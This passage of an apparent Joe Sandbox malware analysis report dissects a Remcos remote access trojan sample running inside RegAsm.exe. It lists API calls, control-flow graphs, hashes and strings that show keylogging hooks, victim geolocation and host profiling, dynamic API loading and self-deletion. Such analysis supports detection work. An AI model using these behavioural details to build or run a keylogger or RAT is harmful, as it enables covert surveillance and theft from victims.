                                                                                                                          control_flow_graph 1666 40a2f3-40a30a 1667 40a30c-40a326 GetModuleHandleA SetWindowsHookExA 1666->1667 1668 40a36e-40a37e GetMessageA 1666->1668 1667->1668 1671 40a328-40a36c GetLastError call 41bc1f call 4052fd call 402093 call 41b580 call 401fd8 1667->1671 1669 40a380-40a398 TranslateMessage DispatchMessageA 1668->1669 1670 40a39a 1668->1670 1669->1668 1669->1670 1672 40a39c-40a3a1 1670->1672 1671->1672
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A30E
                                                                                                                          • SetWindowsHookExA.USER32(0000000D,0040A2DF,00000000), ref: 0040A31C
                                                                                                                          • GetLastError.KERNEL32 ref: 0040A328
                                                                                                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                          • GetMessageA.USER32 ref: 0040A376
                                                                                                                          • TranslateMessage.USER32(?), ref: 0040A385
                                                                                                                          • DispatchMessageA.USER32(?), ref: 0040A390
                                                                                                                          Strings
                                                                                                                          • Keylogger initialization failure: error , xrefs: 0040A33C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                                                                          • String ID: Keylogger initialization failure: error
                                                                                                                          • API String ID: 3219506041-952744263
                                                                                                                          • Opcode ID: 0dc1c2640651d2c5fe804fd6a671654dad06f326112922524979b06ffad0e6ec
                                                                                                                          • Instruction ID: 8743f2250fb8cae6a99ae5fb3d4b34fe2baf279f6720e4878f05ffc9670b3ffc
                                                                                                                          • Opcode Fuzzy Hash: 0dc1c2640651d2c5fe804fd6a671654dad06f326112922524979b06ffad0e6ec
                                                                                                                          • Instruction Fuzzy Hash: 6011BF31510301EBC710BB769D0986B77ACEA95715B20097EFC82E22D1EB34C910CBAA
                                                                                                                          APIs
                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                                                                                          • lstrcatW.KERNEL32(?,?), ref: 10001151
                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                                                                                          • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 100011D0
                                                                                                                          • FindClose.KERNEL32(00000000), ref: 100011DB
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.924923884.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.924918223.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.924923884.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1083526818-0
                                                                                                                          • Opcode ID: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                                                                                          • Instruction ID: 89aa6ca17049c9a574106098fd68ded4b08ae6dd255c3979a52dcbc6bb9ed716
                                                                                                                          • Opcode Fuzzy Hash: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                                                                                          • Instruction Fuzzy Hash: D22193715043586BE714EB649C49FDF7BDCEF84394F00092AFA58D3190E770D64487A6
                                                                                                                          APIs
                                                                                                                          • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B438
                                                                                                                          • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B44E
                                                                                                                          • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B467
                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 0041B4AD
                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 0041B4B0
                                                                                                                          Strings
                                                                                                                          • http://geoplugin.net/json.gp, xrefs: 0041B448
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Internet$CloseHandleOpen$FileRead
                                                                                                                          • String ID: http://geoplugin.net/json.gp
                                                                                                                          • API String ID: 3121278467-91888290
                                                                                                                          • Opcode ID: 70a4068dcfb2335a76a71926155551062e92c520b8980e27f9727ee13041a59e
                                                                                                                          • Instruction ID: e320c318363c88f1c040182635621d8729538b68a2f0080144892bf513bd3cc2
                                                                                                                          • Opcode Fuzzy Hash: 70a4068dcfb2335a76a71926155551062e92c520b8980e27f9727ee13041a59e
                                                                                                                          • Instruction Fuzzy Hash: 011198311053126BD224AB269C49EBF7F9CEF86765F10043EF945A2282DB689C44C6FA
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 004117D7: SetLastError.KERNEL32(0000000D,00411D57,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 004117DD
                                                                                                                          • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411D72
                                                                                                                          • GetNativeSystemInfo.KERNEL32(?), ref: 00411DE0
                                                                                                                          • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 00411E04
                                                                                                                            • Part of subcall function 00411CDE: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411E22,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CEE
                                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00411E4B
                                                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 00411E52
                                                                                                                          • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411F65
                                                                                                                            • Part of subcall function 004120B2: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F72,?,?,?,?,?), ref: 00412122
                                                                                                                            • Part of subcall function 004120B2: HeapFree.KERNEL32(00000000), ref: 00412129
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3950776272-0
                                                                                                                          • Opcode ID: 718d42136e622159178195cb0efe2cc12f9c08079781f225a480952b3bcd75f7
                                                                                                                          • Instruction ID: da58ab861bd0a84ec3871346ef31e8b8814b9d9500880b3a3e1890ad13292c25
                                                                                                                          • Opcode Fuzzy Hash: 718d42136e622159178195cb0efe2cc12f9c08079781f225a480952b3bcd75f7
                                                                                                                          • Instruction Fuzzy Hash: F761A270700611ABCB209F66C981BAA7BA5AF44704F14411AFF05877A2D77CE8C2CBD9
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00413584: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004135A4
                                                                                                                            • Part of subcall function 00413584: RegQueryValueExA.KERNEL32 ref: 004135C2
                                                                                                                            • Part of subcall function 00413584: RegCloseKey.KERNEL32(?), ref: 004135CD
                                                                                                                          • Sleep.KERNEL32(00000BB8), ref: 0040F896
                                                                                                                          • ExitProcess.KERNEL32 ref: 0040F905
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseExitOpenProcessQuerySleepValue
                                                                                                                          • String ID: 5.1.2 Pro$override$pth_unenc
                                                                                                                          • API String ID: 2281282204-3554326054
                                                                                                                          • Opcode ID: 12348d3a2fbe885265e601d0d8f624f68943fb23a48e4508fc59bb7df0f8f03e
                                                                                                                          • Instruction ID: d275b5d15c9ff05a0ec0da3c9587874d7690dc7fa5d0ec02d6e8a4ede61593ab
                                                                                                                          • Opcode Fuzzy Hash: 12348d3a2fbe885265e601d0d8f624f68943fb23a48e4508fc59bb7df0f8f03e
                                                                                                                          • Instruction Fuzzy Hash: 5921E171B0420127D6087676885B6AE399A9B80708F50453FF409672D7FF7C8E0483AF
                                                                                                                          APIs
                                                                                                                          • GetComputerNameExW.KERNEL32(00000001,?,0000002B,02x), ref: 0041B6BB
                                                                                                                          • GetUserNameW.ADVAPI32(?,0040F25E), ref: 0041B6D3
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Name$ComputerUser
                                                                                                                          • String ID: 02x
                                                                                                                          • API String ID: 4229901323-1753518589
                                                                                                                          • Opcode ID: 2a75debd1ac83804218ef8ff91a3dd31c7e5d47f43b5da7d436b4f8c80832694
                                                                                                                          • Instruction ID: 8360233331794fbd8bccde093e114755ab2a7c2896376219b9d5f45c8fb32f7b
                                                                                                                          • Opcode Fuzzy Hash: 2a75debd1ac83804218ef8ff91a3dd31c7e5d47f43b5da7d436b4f8c80832694
                                                                                                                          • Instruction Fuzzy Hash: 90014F7190011CABCB01EBD1DC45EEDB7BCAF44309F10016AB505B21A1EFB46E88CBA8
                                                                                                                          APIs
                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,00433550,00000034,?,?,0078A9C8), ref: 004338DA
                                                                                                                          • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000), ref: 004338F0
                                                                                                                          • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000,0041E2E2), ref: 00433902
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1815803762-0
                                                                                                                          • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                                                                                          • Instruction ID: d68cd6f5f98cbfa2ab0450769c499d20ea76a36e668e3df749659bd42d9a4b78
                                                                                                                          • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                                                                                          • Instruction Fuzzy Hash: 40E09A31208310FBEB301F21AC08F573AA5EF89B66F200A3AF256E40E4D6A68801965C
                                                                                                                          APIs
                                                                                                                          • GetSystemTimeAsFileTime.KERNEL32(00000000,0043AB37), ref: 00448A16
                                                                                                                          Strings
                                                                                                                          • GetSystemTimePreciseAsFileTime, xrefs: 004489F2
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Time$FileSystem
                                                                                                                          • String ID: GetSystemTimePreciseAsFileTime
                                                                                                                          • API String ID: 2086374402-595813830
                                                                                                                          • Opcode ID: c8476c07d91a2673d79eb1bf06ec4ca2dbc9f8e1099c36818990a3b57f66e430
                                                                                                                          • Instruction ID: bacba389ed7ed90706db716b221aab5ed2509560655679cc0f09f15d90276a03
                                                                                                                          • Opcode Fuzzy Hash: c8476c07d91a2673d79eb1bf06ec4ca2dbc9f8e1099c36818990a3b57f66e430
                                                                                                                          • Instruction Fuzzy Hash: 79E0E531A81618FBD7116B25EC02E7EBB50DB08B02B10027FFC05A7292EE754D14D6DE
                                                                                                                          APIs
                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32 ref: 00434BDD
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3192549508-0
                                                                                                                          • Opcode ID: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
                                                                                                                          • Instruction ID: 702e07acd891e046c8aea5fc6397425f5e3bd38ef0af78e1c7fed93ac6412050
                                                                                                                          • Opcode Fuzzy Hash: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
                                                                                                                          • Instruction Fuzzy Hash:

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 5 40ea00-40ea82 call 41cbe1 GetModuleFileNameW call 40f3fe call 4020f6 * 2 call 41beac call 40fb52 call 401e8d call 43fd50 22 40ea84-40eac9 call 40fbee call 401e65 call 401fab call 410f72 call 40fb9f call 40f3eb 5->22 23 40eace-40eb96 call 401e65 call 401fab call 401e65 call 40531e call 406383 call 401fe2 call 401fd8 * 2 call 401e65 call 401fc0 call 405aa6 call 401e65 call 4051e3 call 401e65 call 4051e3 5->23 49 40ef2d-40ef3e call 401fd8 22->49 69 40eb98-40ebe3 call 406c59 call 401fe2 call 401fd8 call 401fab call 413584 23->69 70 40ebe9-40ec04 call 401e65 call 40b9f8 23->70 69->70 101 40f38a-40f3a5 call 401fab call 4139e4 call 4124b0 69->101 80 40ec06-40ec25 call 401fab call 413584 70->80 81 40ec3e-40ec45 call 40d0a4 70->81 80->81 97 40ec27-40ec3d call 401fab call 4139e4 80->97 89 40ec47-40ec49 81->89 90 40ec4e-40ec55 81->90 93 40ef2c 89->93 94 40ec57 90->94 95 40ec59-40ec65 call 41b354 90->95 93->49 94->95 105 40ec67-40ec69 95->105 106 40ec6e-40ec72 95->106 97->81 126 40f3aa-40f3db call 41bcef call 401f04 call 413a5e call 401f09 * 2 101->126 105->106 108 40ecb1-40ecc4 call 401e65 call 401fab 106->108 109 40ec74 call 407751 106->109 127 40ecc6 call 407790 108->127 128 40eccb-40ed53 call 401e65 call 41bcef call 401f13 call 401f09 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab 108->128 117 40ec79-40ec7b 109->117 120 40ec87-40ec9a call 401e65 call 401fab 117->120 121 40ec7d-40ec82 call 407773 call 40729b 117->121 120->108 142 40ec9c-40eca2 120->142 121->120 157 40f3e0-40f3ea call 40dd7d call 414f65 126->157 127->128 177 40ed55-40ed6e call 401e65 call 401fab call 43bb56 128->177 178 40edbb-40edbf 128->178 142->108 143 40eca4-40ecaa 142->143 143->108 146 40ecac call 40729b 143->146 146->108 177->178 205 40ed70-40edb6 call 401e65 call 401fab call 401e65 call 401fab call 40da6f call 401f13 call 401f09 177->205 180 40ef41-40efa1 call 436f10 call 40247c call 401fab * 2 call 413733 call 409092 178->180 181 40edc5-40edcc 178->181 236 40efa6-40effa call 401e65 call 401fab call 402093 call 401fab call 4137aa call 401e65 call 401fab call 43bb2c 180->236 183 40ee4a-40ee54 call 409092 181->183 184 40edce-40ee48 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 40ce34 181->184 191 40ee59-40ee7d call 40247c call 434829 183->191 184->191 212 40ee8c 191->212 213 40ee7f-40ee8a call 436f10 191->213 205->178 218 40ee8e-40eed9 call 401f04 call 43f859 call 40247c call 401fab call 40247c call 401fab call 413982 212->218 213->218 273 40eede-40ef03 call 434832 call 401e65 call 40b9f8 218->273 287 40f017-40f019 236->287 288 40effc 236->288 273->236 286 40ef09-40ef28 call 401e65 call 41bcef call 40f4af 273->286 286->236 306 40ef2a 286->306 289 40f01b-40f01d 287->289 290 40f01f 287->290 292 40effe-40f015 call 41ce2c CreateThread 288->292 289->292 293 40f025-40f101 call 402093 * 2 call 41b580 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 43bb2c call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab StrToIntA call 409e1f call 401e65 call 401fab 290->293 292->293 344 40f103-40f13a call 43455e call 401e65 call 401fab CreateThread 293->344 345 40f13c 293->345 306->93 346 40f13e-40f156 call 401e65 call 401fab 344->346 345->346 357 40f194-40f1a7 call 401e65 call 401fab 346->357 358 40f158-40f18f call 43455e call 401e65 call 401fab CreateThread 346->358 368 40f207-40f21a call 401e65 call 401fab 357->368 369 40f1a9-40f202 call 401e65 call 401fab call 401e65 call 401fab call 40da23 call 401f13 call 401f09 CreateThread 357->369 358->357 379 40f255-40f279 call 41b69e call 401f13 call 401f09 368->379 380 40f21c-40f250 call 401e65 call 401fab call 401e65 call 401fab call 43bb2c call 40c19d 368->380 369->368 402 40f27b-40f27c SetProcessDEPPolicy 379->402 403 40f27e-40f291 CreateThread 379->403 380->379 402->403 404 40f293-40f29d CreateThread 403->404 405 40f29f-40f2a6 403->405 404->405 408 40f2b4-40f2bb 405->408 409 40f2a8-40f2b2 CreateThread 405->409 412 40f2c9 408->412 413 40f2bd-40f2c0 408->413 409->408 418 40f2ce-40f302 call 402093 call 4052fd call 402093 call 41b580 call 401fd8 412->418 415 40f2c2-40f2c7 413->415 416 40f307-40f31a call 401fab call 41353a 413->416 415->418 425 40f31f-40f322 416->425 418->416 425->157 427 40f328-40f368 call 41bcef call 401f04 call 413656 call 401f09 call 401f04 425->427 443 40f381-40f386 DeleteFileW 427->443 444 40f388 443->444 445 40f36a-40f36d 443->445 444->126 445->126 446 40f36f-40f37c Sleep call 401f04 445->446 446->443
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Psapi), ref: 0041CBF6
                                                                                                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CBFF
                                                                                                                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                                                                                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC19
                                                                                                                            • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(shcore), ref: 0041CC2B
                                                                                                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC2E
                                                                                                                            • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(user32), ref: 0041CC3F
                                                                                                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC42
                                                                                                                            • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(ntdll), ref: 0041CC54
                                                                                                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC57
                                                                                                                            • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(kernel32), ref: 0041CC63
                                                                                                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC66
                                                                                                                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                                                                                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC7A
                                                                                                                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                                                                                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC8E
                                                                                                                            • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shell32), ref: 0041CC9F
                                                                                                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCA2
                                                                                                                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                                                                                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCB6
                                                                                                                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                                                                                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCCA
                                                                                                                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                                                                                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCDE
                                                                                                                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                                                                                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCF2
                                                                                                                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                                                                                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD06
                                                                                                                            • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CD14
                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 0040EA29
                                                                                                                            • Part of subcall function 00410F72: __EH_prolog.LIBCMT ref: 00410F77
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                                                                                          • String ID: ({x$02x$8SG$8SG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Exe$Exe$Inj$Remcos Agent initialized$Rmc-EPF38I$Software\$User$dMG$del$del$exepath$licence$license_code.txt
                                                                                                                          • API String ID: 2830904901-2271824644
                                                                                                                          • Opcode ID: 3a9e47304c5b1ac1d47b526da143f65d2c8c268b4d4311492a9f71a269f98634
                                                                                                                          • Instruction ID: f870588dacc207cf398a21a9077505b2b75b96970711a81e27f166ce8512e3fa
                                                                                                                          • Opcode Fuzzy Hash: 3a9e47304c5b1ac1d47b526da143f65d2c8c268b4d4311492a9f71a269f98634
                                                                                                                          • Instruction Fuzzy Hash: 9B32F960B043412BDA24B7729C57B7E26994F80748F50483FB9467B2E3EEBC8D45839E

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 494 414f65-414fad call 4020df call 41b944 call 4020df call 401e65 call 401fab call 43bb2c 507 414fbc-415008 call 402093 call 401e65 call 4020f6 call 41beac call 40489e call 401e65 call 40b9f8 494->507 508 414faf-414fb6 Sleep 494->508 523 41500a-415079 call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 40473d 507->523 524 41507c-415117 call 402093 call 401e65 call 4020f6 call 41beac call 401e65 * 2 call 406c59 call 402f10 call 401fe2 call 401fd8 * 2 call 401e65 call 405b05 507->524 508->507 523->524 577 415127-41512e 524->577 578 415119-415125 524->578 579 415133-4151c5 call 405aa6 call 40531e call 406383 call 402f10 call 402093 call 41b580 call 401fd8 * 2 call 401e65 call 401fab call 401e65 call 401fab call 414f24 577->579 578->579 606 415210-41521e call 40482d 579->606 607 4151c7-41520b WSAGetLastError call 41cb72 call 4052fd call 402093 call 41b580 call 401fd8 579->607 613 415220-415246 call 402093 * 2 call 41b580 606->613 614 41524b-415260 call 404f51 call 4048c8 606->614 630 415ade-415af0 call 404e26 call 4021fa 607->630 613->630 629 415266-4153b9 call 401e65 * 2 call 40531e call 406383 call 402f10 call 406383 call 402f10 call 402093 call 41b580 call 401fd8 * 4 call 41b871 call 4145f8 call 409097 call 441ed1 call 401e65 call 4020f6 call 40247c call 401fab * 2 call 413733 614->629 614->630 694 4153bb-4153c8 call 405aa6 629->694 695 4153cd-4153f4 call 401fab call 4135e1 629->695 642 415af2-415b12 call 401e65 call 401fab call 43bb2c Sleep 630->642 643 415b18-415b20 call 401e8d 630->643 642->643 643->524 694->695 701 4153f6-4153f8 695->701 702 4153fb-4154c0 call 40417e call 40ddc4 call 41bcd3 call 41bdaf call 41bc1f call 401e65 GetTickCount call 41bc1f call 41bb77 call 41bc1f * 2 call 41bb27 695->702 701->702 725 4154c5-415a51 call 41bdaf * 5 call 40f90c call 41bdaf call 402f31 call 402ea1 call 402f10 call 402ea1 call 402f10 * 3 call 402ea1 call 402f10 call 406383 call 402f10 call 406383 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 406383 call 402f10 * 5 call 402ea1 call 402f10 call 402ea1 call 402f10 * 7 call 402ea1 call 404aa1 call 401fd8 * 50 call 401f09 call 401fd8 